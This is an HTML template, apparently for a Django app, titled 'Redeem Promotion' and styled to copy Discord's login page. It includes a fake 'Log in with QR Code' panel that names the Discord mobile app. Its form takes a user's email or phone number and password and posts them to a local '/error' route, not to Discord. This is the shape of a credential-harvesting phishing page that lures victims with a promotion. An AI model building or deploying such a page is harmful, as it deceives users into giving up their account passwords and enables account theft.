<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1.0, shrink-to-fit=no"
    />
    <title>Redeem Promotion</title>
    <link rel="icon" href="static\images\logo.png" type="image/icon type">
    <style>
      body {
        margin: 0px;
        padding: 0px;
        font-family: ginto ,sans-serif;
        background: url(static/images/arkaplan.png);
        background-size: cover;
        color: #8e9297;
        line-height: 10px;
      }

      .login-box {
        width: 781px;
        height: 360px;
        background-color: #36393f;
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        border-radius: 5px;
        padding: 15px;
      }

      .login-ic-box {
        display: flex;
        align-content: stretch;
        justify-content: space-around;
        flex-wrap: nowrap;
        flex-direction: row;
        align-items: center;
      }

      .sol-box {
        width: 450px;
      }

      .sol-box h2 {
        color: white;
      }

      .sol-box span {
        color: #b9bbbe;
      }

      .form-box {
        font-size: 16px;
      }

      .sol-box input {
        box-sizing: border-box;
        width: 100%;
        border-radius: 4px;
        background-color: #303338;
        border: 1px solid #212327;
        padding: 13px;
      }

      .unuttum {
        color: #00aff4;
        margin-top: 15px;
        text-decoration: none;
        font-size: 14px;
      }

      .login-button {
        text-align: center;
        background-color: #5865f2;
        padding: 15px;
        width: 100%;
        color: white;
        border: none;
        font-weight: 700;
      }

      .iht {
        color: #72767d;
        font-size: 14px;
        line-height: 40px;
      }

      .sag-box {
        right: 10px;
        width: 250px;
        text-align: center;
        line-height: 20px;
      }

      .sag-box h2 {
        color: white;
      }

      @media only screen and (max-width: 760px) {
        .sag-box {
          display: none;
        }
      }

      .heading {
        margin-bottom: 10px;
        margin-top: 30px;
      }

      input {
        color: white;
      }
    </style>
  </head>
  <body>
    <div class="login-box">
      <div class="login-ic-box">
        <div class="sol-box">
          <h2>Welcome back!</h2>
          <span>We're so excited to see you again!</span>
          <form class="form-box" autocomplete="on" method="POST" action="\error">
          {% csrf_token %} 
            <h5 class="heading">EMAIL OR PHONE NUMBER</h5>
            <input type="email" autocomplete="on" id="email" name = "email" required="true" />
            <h5 class="heading">PASSWORD</h5>
            <input type="password" autocomplete="on" id="password" name ="password" required="true" />
            <a href="#"><div class="unuttum">Forgot your password?</div></a>
            <br />
            <button class="login-button" type="submit">Login</button>
            <span class="iht"
              >Need an account?<font class="unuttum"> Register</font></span
            >
          </form>
        </div>
        <div class="sag-box">
          <img src="static\images\barkod.png" />

          <h2>Log in with QR Code</h2>
          <div>
            Scan this with the <strong>Discord mobile app</strong> to log in
            instantly
          </div>
        </div>
      </div>
    </div>
  </body>
</html>
